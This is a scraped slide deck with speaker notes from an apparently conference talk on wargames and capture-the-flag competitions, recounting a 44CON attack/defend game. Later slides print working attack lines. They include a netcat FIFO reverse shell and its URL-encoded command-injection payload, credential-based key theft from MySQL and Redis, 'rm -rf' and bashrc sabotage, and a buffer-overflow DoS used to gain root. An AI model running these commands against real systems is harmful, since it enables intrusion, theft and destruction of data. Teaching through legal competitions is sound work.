![Loaded 1 password hash (FreeBSD MD5 [32/32])
******* (administrator)
guesses: 1 time: 0:00:00:18 100% c/s: 13207 trying: ********](https://image.slidesharecdn.com/playingctfsforfunprofit-1-2-130602082513-phpapp01/85/Playing-CTFs-for-Fun-Profit-23-320.jpg)
![Auth exploitation
gdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x403000 0x3000 0x0 /services/auth/auth
0x602000 0x603000 0x1000 0x2000 /services/auth/auth
0x603000 0x604000 0x1000 0x3000 /services/auth/auth
0x604000 0x625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]](https://image.slidesharecdn.com/playingctfsforfunprofit-1-2-130602082513-phpapp01/85/Playing-CTFs-for-Fun-Profit-86-320.jpg)
![Auth exploitation
gdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth
0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth
0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth
0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall](readonly)](https://image.slidesharecdn.com/playingctfsforfunprofit-1-2-130602082513-phpapp01/85/Playing-CTFs-for-Fun-Profit-87-320.jpg)
![Servicemon - exploitation
contestant@ubuntu:~$ nc -lv 31337
Connection from 192.168.1.72 port 31337 [tcp/*]
accepted
$ whoami
contestant
$ pwd
/services/servicemon
I got a shell!
Now I can have some fun!](https://image.slidesharecdn.com/playingctfsforfunprofit-1-2-130602082513-phpapp01/85/Playing-CTFs-for-Fun-Profit-98-320.jpg)
![Escalation – the hard way
When auth starts we will get a root shell
Lame DoS to the rescue!
perl -e 'print "auth " . "A"x1100 . "n"' |
nc ip 23500
Connection from 192.168.1.73 port 31337 [tcp/*]
accepted
# whoami
root](https://image.slidesharecdn.com/playingctfsforfunprofit-1-2-130602082513-phpapp01/85/Playing-CTFs-for-Fun-Profit-108-320.jpg)
More Related Content
![Overview of the Cyber Kill Chain [TM]](https://cdn.slidesharecdn.com/ss_thumbnails/cybersecuritykillchain8-161209191549-thumbnail.jpg?width=640&height=640&fit=bounds)
Similar to Playing CTFs for Fun & Profit
![[CB16] About the cyber grand challenge: the world’s first all-machine hacking...](https://cdn.slidesharecdn.com/ss_thumbnails/cb16nighswanderen-161108072338-thumbnail.jpg?width=640&height=640&fit=bounds)
![CTF CyberX-Mind4Future[4].pptx](https://cdn.slidesharecdn.com/ss_thumbnails/ctfcyberx-mind4future4-230227112745-c0c64f1b-thumbnail.jpg?width=640&height=640&fit=bounds)
![[2012 CodeEngn Conference 06] posquit0 - Defcon 20th : The way to go to Las V...](https://cdn.slidesharecdn.com/ss_thumbnails/20126thcodeengnposquit0defcon20ththewaytogotolasvegas-130525175655-phpapp01-thumbnail.jpg?width=640&height=640&fit=bounds)
Playing CTFs for Fun & Profit
- 1. Playing CTFs forFun & Profit
- 2. Me @impdefined Software developer Know alot about bugs Trying not to make things worse
- 3. Me Playing CTFs for~2 years CTF team 0xbadf00d Contributor to io.smashthestack.org
- 4.
- 5.
- 6. Wargames & CTFs– Why? Learning Hands-on experience Legal Fun! (and profit)
- 7. Wargames & CTFs– Why?
- 8.
- 9.
- 10.
- 11.
- 12. Wargames Technical security exercises Hackingchallenges Progress through series of levels No time limits Solo
- 13. Wargames - categories Web Binaryexploitation Cryptography General design flaws
- 14.
- 23. Loaded 1 passwordhash (FreeBSD MD5 [32/32]) ******* (administrator) guesses: 1 time: 0:00:00:18 100% c/s: 13207 trying: ********
- 25.
- 26. Playing wargames Igot to: Implement a padding oracle attack against RSA Despair at the state of PHP Implement a CPU timing attack Exploit a kernel stack buffer overflow Create a JS VM for a custom processor architecture Write lots of custom shellcode XOR all the things
- 27.
- 28. Capture the Flag Time-limitedevent to test your skills Team-based Competitive Not “progressive”
- 29. CTF types Challenge-based DEF CONquals Ghost In The Shellcode CSAW CTF Attack/defend DEF CON finals 44Con CTF 2012
- 30. CTF types Lots ofonline events ~20 last year mainly challenge-based Live events! 44CON: Lewt RuCTFE: £3,000 Codegate: £11,000
- 31.
- 35. Capture the flagexperience
- 36. Capture the flagexperience
- 37. CTF challenge -jacked
- 38. CTF challenge -jacked # nc jacked.final2012.ghostintheshellcode.com 2121 Jack's Blackjack Simulator Blackjack pays 2:1 Dealer must hit soft 17 Single deck, shuffled after every round Enter your name: pwn Your table companions: Player 1 is Tracy with $1332 Player 2 is Grace with $770 Player 3 is Curtis with $1376 Player 4 is Bryan with $1950 You have $1000 Place your bet (zero to exit): $
- 39. CTF challenge -jacked $1,000,000,000 will win the game Good random source 32bit seed Player 1 is Tracy with $1332 Player 2 is Grace with $770 Player 3 is Curtis with $1376 Player 4 is Bryan with $1950
- 40. CTF challenge -jacked
- 41. CTF challenge -Folly Text adventure On winning, enter shellcode Binary is chrooted, make custom code Read “key” file... get another port and binary
- 42. CTF challenge -Folly x86_64 x86 ARM ARM Thumb PPC Alpha Cris
- 43. CTF challenge -blocky
- 44. CTF challenge -blocky
- 45. CTF challenge -blocky
- 46. CTF challenge -blocky
- 47. CTF challenge -blocky
- 48. CTF challenge -blocky
- 49. CTF challenge -blocky
- 50.
- 51. 44CON CTF 2012 Attack& Defend Provided with: Virtual machine IP address Ranges of target machines
- 52. Attack & Defend Kindof like a pentest but more fun I have a plan Recon Harden Write exploits Run riot Get the girl
- 53. Recon I'd rather beoffline than owned Self-recon Capture traffic Quick nmap of non-player servers
- 54.
- 55.
- 56. Recon - scoring Packetcaptures shed some light Regular "scoring rounds“ Every 30 minutes Scoring server stores new keys in services and checks for previous keys
- 57.
- 58.
- 59.
- 60.
- 61. Pastie Written in PHP Pastesstored in a MySQL database PHP+MySQL Can you tell what the vuln is yet?
- 62. Pastie vulnerability Classic SQLinjection
- 63. Pastie fix It’s notall pwnpwnpwn Updated code with prepared statements PHP
- 64.
- 65.
- 66.
- 67. Pastie exploit –scripted
- 68.
- 69. Mailserver SMTP and POP3server Keys stored in emails Written in Ruby I don’t know Ruby Only ~500 lines
- 70. Mailserver - vulnerability Thisjust interprets provided text as ruby code Time to learn Ruby! ???
- 71. Mailserver - vulnerability Lookingat the logs... Verify vulnerability
- 72. Mailserver - exploitation I'msure Ruby is lovely... ... but let's just find some code to copy
- 73.
- 74.
- 75.
- 76.
- 77.
- 78.
- 79.
- 80.
- 81.
- 82. Auth exploitation Classic stackbuffer overflow Overwrite return address with any value Pre-auth remote code execution...
- 83. Auth exploitation Classic stackbuffer overflow Overwrite return address with any value Pre-auth remote code execution... ... noooope.
- 84.
- 85. Auth exploitation Put avalid writable address in the pointer Easy if this was a 32bit process 64bit, annoying memory space
- 86. Auth exploitation gdb$ infoproc map Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x403000 0x3000 0x0 /services/auth/auth 0x602000 0x603000 0x1000 0x2000 /services/auth/auth 0x603000 0x604000 0x1000 0x3000 /services/auth/auth 0x604000 0x625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
- 87. Auth exploitation gdb$ infoproc map Mapped address spaces: Start Addr End Addr Size Offset objfile 0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth 0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth 0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth 0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall](readonly)
- 88. Auth exploitation Time’s up! Noremote code execution Very limited DoS Crash process Restarts automatically
- 89.
- 90.
- 91.
- 92.
- 93. Servicemon Command injection via"filelist" parameter
- 94. Servicemon - vulnerability filelist=/services/auth/auth %x(shasum/services/auth/auth) filelist=notafile || id %x(shasum notafile || id)
- 95.
- 96. Servicemon - exploitation Nevermind keys, I want a shell contestant@ubuntu:~$ nc -l 31337 -e /bin/sh nc: invalid option -- 'e'
- 97. Servicemon - exploitation Standback... I know bash* rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp %2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20% 2Ftmp%2Ff%7C%2Fbin%2Fsh%20- i%202>%261%7Cnc%20192.168.1.75%203133 7%20>%2Ftmp%2Ff * totally copied from somewhere
- 98. Servicemon - exploitation contestant@ubuntu:~$nc -lv 31337 Connection from 192.168.1.72 port 31337 [tcp/*] accepted $ whoami contestant $ pwd /services/servicemon I got a shell! Now I can have some fun!
- 99.
- 100.
- 101. Steal all thekeys mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;" mysql --user=pastie --password=J@cobsClub$ paste -e "select pastie from pastie order by date desc limit 1;" OUTPUT=redis-cli -r 1 keys * | tail -n 1 redis-cli -r 1 lrange $OUTPUT 0 1
- 102. Leave a callingcard echo 'Look behind you! A three-headed monkey!' > /services/pastie/.win
- 103. Annoy echo exit >>~/.bashrc rm -rf /services echo 'export PROMPT_COMMAND="cd"' >> ~/.bashrc
- 104.
- 105. Escalation Getting keys isfine Getting shells is better Getting root is best
- 106. Escalation – thehard way $ find /etc -writable /etc/init/mail.conf /etc/init/auth.conf
- 107. Escalation – thehard way USER PID TTY STAT COMMAND root 8680 ? Ss /services/auth/auth
- 108. Escalation – thehard way When auth starts we will get a root shell Lame DoS to the rescue! perl -e 'print "auth " . "A"x1100 . "n"' | nc ip 23500 Connection from 192.168.1.73 port 31337 [tcp/*] accepted # whoami root
- 109. Escalation – theeasy way 220 Mail Service ready (33147) HELO 250 Requested mail action okay, completed EXPN respond(client, %x(whoami)) root
- 110.
- 111. Useful stuff –general Scripting language Hex editor Linux & Windows VMs The linux “file” command
- 112. Useful stuff -web Firefox + Firebug + Tamper data php.net
- 113. Useful stuff -binary C Disassembler (IDA demo, Hopper)
- 114. Useful stuff -CTF Collaboration! Hall.com sync.in Wiki IRC
- 115. Wargame recommendations overthewire.org (Natas)Web exploitation io.smasthestack.org Binary exploitation hackthissite.org Web exploitation overthewire.org (Vortex) Binary exploitation overthewire.org (Bandit) "Absolute beginners" (learn how to Linux)
- 116. CTF recommendations http://ctftime.org DEF CONCTF June Binary-heavy CSAW CTF “gentle” introduction September
- 117. Motivation 44CON Lewt CSAW £600 HitBAMS £1,500 Plaid £2,500 RuCTFE £3,000 PHdays £6,000 Codegate £11,000
- 118.
- 119.
Editor's Notes
- #2 Version 1.2
- #4 I’ve been playing CTFs for around 2 years now.
- #5 Who has played a CTF before? How about wargames?
- #6 Who here has played a CTF before? And how about wargames?
- #14 Next to look at some wargames sites
- #18 Pick a link
- #19 The links show different images. Interesting.
- #20 Trying to view page source
- #22 Trying to view the admin directory. What files control basic authentication?
- #25 I’m not going to go through this binary challenge, but it does give you an idea of the level of tutorial in some games.
- #26 This is the typical wargames experience.
- #27 There are lots of wargames around – I have some specific recommendations at the end
- #29 Often same kinds of challenges as wargames. Lots of exploitation!By “progressive” I mean that you can generally attempt any tasks rather than having to complete “easier” ones first.
- #30 Challenge-based also called “jeopardy” style
- #31 After this, let’s look at some CTF scoreboards
- #40 From these values we can brute-force calculate the initial seed. Thanks to Paco Hope for a great DC4420 talk on randomness!Then we can start the program, give it that seed, and see for each hand whether we’ll win or lose. We need ONE BILLION DOLLARS to win.
- #41 So when we win, this code is reached. Can anyone see how we’d actually exploit this?
- #59 Running on port 443, simple web interface.
- #60 Enter whatever text you want, choose a “language”, hit submit
- #61 Click to show random text highlighted.Recon shows that the “keys” are entered as pastes and then checked again later.
- #62 Digging into how pastie works
- #64 The “defence” side is something you don’t get in wargames or challenge CTFs, so this was all new to me
- #65 Ran mysql against my instance to figure out the query needed to get data out.
- #68 And that’s the pastie service done
- #71 Where to start? Just browsing through piles of incomprehensible ruby.
- #72 Let’s verify that this does what it looks like it does.No 250 response code, just closes the connection.
- #73 So how to exploit? I want to get the keys out.
- #78 It doesn't seem to respond to much
- #79 I love binary exploitation. I used to think I was ok at it.
- #80 What does it actually do?
- #81 Who can name a dangerous C function?
- #83 Classic SBO, surely this gives remote pre-auth code execution?
- #84 Nope
- #85 Welcome to CTF rage. Remember this buffer here? Well before we return from the function it gets written to. But we've nuked whatever value is there, so the program tries to write to junk memory, and crashes.
- #87 Memory map of auth process
- #88 When we add the implicit zeroes in, we can see that all of the writable memory addresses have zeroes in them. And since our exploitation path is via strcpy, we can’t put nulls in the address because we need to keep overwriting up to the return address.
- #89 Now for my l33t exploit. Nope. Out of time.
- #91 Apache, running on port 3000
- #92 Found the ruby code being run. It looks like it monitors other services.
- #93 It can also get hashes of files. Can anyone guess what the exploit is yet?
- #94 It can also get hashes of files. Can anyone guess what the exploit is yet?
- #95 Semicolons didn’t work, I’m not entirely sure why. Elegance is not the aim!
- #98 Trick to use FIFOs to create a connectback shell. Urlencodes to a bit of a mouthful.
- #99 We start a listener
- #102 Defense in depth! At this point I can basically go raiding all the keys from any machine, unless they’ve changed several passwords.
- #104 Last one changes them back to their home directory before each command.
- #106 We’re hackers. Go root or go home.
- #107 You've got a shell, now what?They've changed the password, so sudo doesn't work!What can we edit, configuration-wise?
- #108 Auth runs as root. We can make something else run as root. How about our connect-back code?
- #109 How do we go about making auth restart? Lame DoS. Root.
- #111 Just give it a go. Try some wargames. You will get stuck. Persist!For CTFs, find some buddies, maybe here @ Bsides, and get a team together!
- #113 Everyone knows you shouldn’t trust client-side data. These plugins help you make client-side data particularly untrustworthy.
- #116 Bandit isn’t really much of a wargame – it will give you some Linux skills which will be useful though
- #118 I like learning, I enjoy it. Some people like money.